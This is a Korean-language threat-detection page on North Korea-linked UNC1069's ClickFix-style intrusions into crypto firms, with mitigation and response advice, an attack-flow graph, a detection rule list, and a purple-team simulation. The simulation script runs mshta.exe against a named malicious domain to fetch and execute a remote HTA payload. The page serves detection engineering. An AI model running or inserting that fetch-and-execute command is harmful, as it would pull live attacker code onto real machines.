팔로우 
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
북한과 연계된 UNC1069가 암호화 핀테크를 대상으로 AI 생성 딥페이크 비디오, 탈취된 텔레그램 계정, 가짜 줌 회의를 결합한 다단계 침투를 통해 피해자로 하여금 악성 명령을 실행하도록 유도했습니다.
조사
맨디언트는 macOS 호스트에서 새롭게 관찰된 SILENCELIFT, DEEPBREATH, CHROMEPUSH를 포함하여 알려진 다운로더 SUGARLOADER와 함께 7개의 악성코드 가족을 확인했습니다. 이 체인은 ClickFix 스타일의 명령으로 시작하여 악성 도메인에서 페이로드를 가져오고, 자격 증명, 브라우저 데이터, 메시징 내용을 탈취하는 로더와 백도어를 통해 이동했습니다. 후기 단계에서는 모듈화된 메모리 상주 실행을 사용하여 디스크 흔적을 최소화했습니다.
완화
소셜 공학 채널 전반에 걸쳐 검증을 강화하고, 서명되지 않은 스크립트 실행을 제한하며, 이상한 curl 또는 mshta 사용을 모니터링하세요. macOS에서는 코드 서명과 런치 데몬 제어를 시행하고, TCC 권한과 네이티브 메시징 호스트 디렉토리에서 알 수 없는 파일을 감사하세요.
대응
엔드포인트를 격리하고, 명령줄 아티팩트를 보존하며, 악성 런치 데몬 plist를 검색하고, 모든 확인된 C2 도메인을 차단하세요. 키체인, 브라우저, 텔레그램 자격증명을 재설정하고, 잔여 로더를 검색하세요. 무단 액세스에 대해 영향을 받은 계정을 검토하고 봉쇄를 조정하세요.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>Action</b> – <b>T1204.001 User Execution</b>: 악성 링크가 탈취된 텔레그램 계정과 위조된 줌 회의를 통해 전달<br/><b>Description</b>: 피해자가 명령 문자열을 복사하여 실행"] class action_initial_access action tool_telegram["<b>Tool</b> – <b>Name</b>: 텔레그램 (탈취됨)<br/><b>Role</b>: 악성 링크 전송 채널"] class tool_telegram tool tool_zoom["<b>Tool</b> – <b>Name</b>: Zoom (위조된 회의)<br/><b>Role</b>: 소셜 엔지니어링 벡터"] class tool_zoom tool action_execution_unix_shell["<b>Action</b> – <b>T1059.004 Unix Shell</b>: WAVESHAPER를 다운로드하기 위해 zsh로 curl 명령 실행<br/><b>Description</b>: 백도어 다운로드 및 실행"] class action_execution_unix_shell action tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Purpose</b>: 원격 페이로드 검색"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Name</b>: WAVESHAPER<br/><b>Function</b>: 다운로드 및 실행된 백도어"] class malware_waveshaper malware action_execution_mshta["<b>Action</b> – <b>T1218.005 Mshta Proxy Execution</b>: mshta를 사용하여 HYPERCALL 다운로더 검색 및 실행"] class action_execution_mshta action tool_mshta["<b>Tool</b> – <b>Name</b>: mshta<br/><b>Purpose</b>: 원격 HTML 애플리케이션 실행"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Name</b>: HYPERCALL<br/><b>Function</b>: mshta를 통해 실행된 다운로더"] class malware_hypercall malware process_launch_daemon["<b>Process</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>Purpose</b>: 시스템 시작 시 SUGARLOADER 실행"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Name</b>: SUGARLOADER<br/><b>Function</b>: 지속적 구성 요소"] class malware_sugarloader malware action_defense_evasion["<b>Action</b> – <b>T1027.004 Compile After Delivery</b>: RC4로 설정을 암호화하여 C2 URL 숨기기"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Name</b>: DEEPBREATH<br/><b>Capabilities</b>: 키체인 및 브라우저 저장소 액세스"] class malware_deepbreath malware action_cred_keychain["<b>Action</b> – <b>T1555.001 Keychain</b>: macOS 키체인에서 자격 증명 추출"] class action_cred_keychain action action_cred_browser["<b>Action</b> – <b>T1555.003 Web Browsers</b>: Chrome, Brave, Edge에서 쿠키, 로그인, 확장 프로그램 추출"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Name</b>: CHROMEPUSH<br/><b>Capability</b>: 브라우저 확장 프로그램 키로거"] class malware_chromepush malware action_keylogging["<b>Action</b> – <b>T1056.001 Keylogging</b>: 악성 확장을 통한 키 입력 캡처"] class action_keylogging action action_local_staging["<b>Action</b> – <b>T1074.001 Local Data Staging</b>: 수집된 데이터를 임시 디렉토리에 저장"] class action_local_staging action action_remote_staging["<b>Action</b> – <b>T1074.002 Remote Data Staging</b>: 수집된 데이터를 C2로 curl을 사용하여 업로드"] class action_remote_staging action action_c2_http["<b>Action</b> – <b>T1102.003 Web Service Oneu2011Way</b>: HTTP POST를 통해 탈취된 데이터 전송"] class action_c2_http action action_exfiltration["<b>Action</b> – <b>T1020 Automated Exfiltration</b>: C2 서버로 데이터 자동 업로드"] class action_exfiltration action %% Connections action_initial_access –>|uses| tool_telegram tool_telegram –>|delivers link to| tool_zoom tool_zoom –>|leads to| action_execution_unix_shell action_execution_unix_shell –>|executes| tool_curl tool_curl –>|downloads| malware_waveshaper malware_waveshaper –>|triggers| action_defense_evasion action_initial_access –>|also triggers| action_execution_mshta action_execution_mshta –>|uses| tool_mshta tool_mshta –>|retrieves| malware_hypercall malware_hypercall –>|installs| process_launch_daemon process_launch_daemon –>|starts| malware_sugarloader malware_sugarloader –>|loads| malware_deepbreath malware_deepbreath –>|performs| action_cred_keychain malware_deepbreath –>|performs| action_cred_browser malware_deepbreath –>|installs| malware_chromepush malware_chromepush –>|executes| action_keylogging action_keylogging –>|stores data in| action_local_staging action_local_staging –>|uploads via curl to| action_remote_staging action_remote_staging –>|sends data to| action_c2_http action_c2_http –>|facilitates| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
공격 흐름
탐지
Possible System_profiler Enumeration Attempt (via process_creation)
보기
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
보기
Possible System Updates Enumeration Attempt (via process_creation)
보기
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
보기
PnPtUtil for Devices Enumeration (via cmdline)
보기
Possible System Enumeration (via cmdline)
보기
IOCs (HashMd5) to detect: UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering
보기
IOCs (HashSha256) to detect: UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering
보기
UNC1069 MacOS 감염 벡터 ClickFix [Linux 프로세스 생성]
보기
UNC1069 ClickFix 공격 명령 실행 [Windows 프로세스 생성]
보기
시뮬레이션 실행
전제 조건: Telemetry & Baseline Pre-flight Check가 완료되어야 합니다.
이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적군의 기법(TTP)의 정확한 실행을 상세히 설명합니다. 명령과 서사는 식별된 TTP를 직접 반영하며, 탐지 논리에 기대되는 정확한 텔레메트리를 생성하는 것을 목표로 합니다.
-
공격 내러티브 및 명령:
적군은 피싱 이메일을 통해 초기 자리를 확보한 후mshta를 사용하여https://mylingocoin.com/audio/fix/6454694440에서 악성 HTML 애플리케이션을 가져옵니다. 이 HTA 파일은 암호화 채굴 프로그램을 설치하는 PowerShell 페이로드를 포함합니다. HTA를 실행하기 전에 공격자는setx audio_volume 100을 실행하여 오디오 하위 시스템이 알려진 상태인지 확인합니다(ClickFix 캠페인의 일부 변형은 팝업을 숨기기 위해 오디오 설정을 변경합니다). 두 명령어 모두 PowerShell 콘솔에서 직접 실행되며, 이는 Sigma 규칙과 정확히 일치하는 CommandLine 필드를 생성합니다. -
회귀 테스트 스크립트:
# UNC1069 ClickFix Attack Simulation – Sigma 규칙 트리거 # Step 1: 탐지와 일치하는 적당해 보이는 환경 변수 유지 setx audio_volume 100 # Step 2: 악성 HTA 실행 - 규칙 탐지에 사용된 정확한 URL $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # 선택 사항: HTA 시작을 위해 몇 초간 대기 Start-Sleep -Seconds 5 -
정리 명령:
# 이전에 설정한 환경 변수를 삭제 reg delete "HKCUEnvironment" /v "audio_volume" /f # 테스트로 생성된 실행중인 모든 mshta 프로세스를 종료 Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force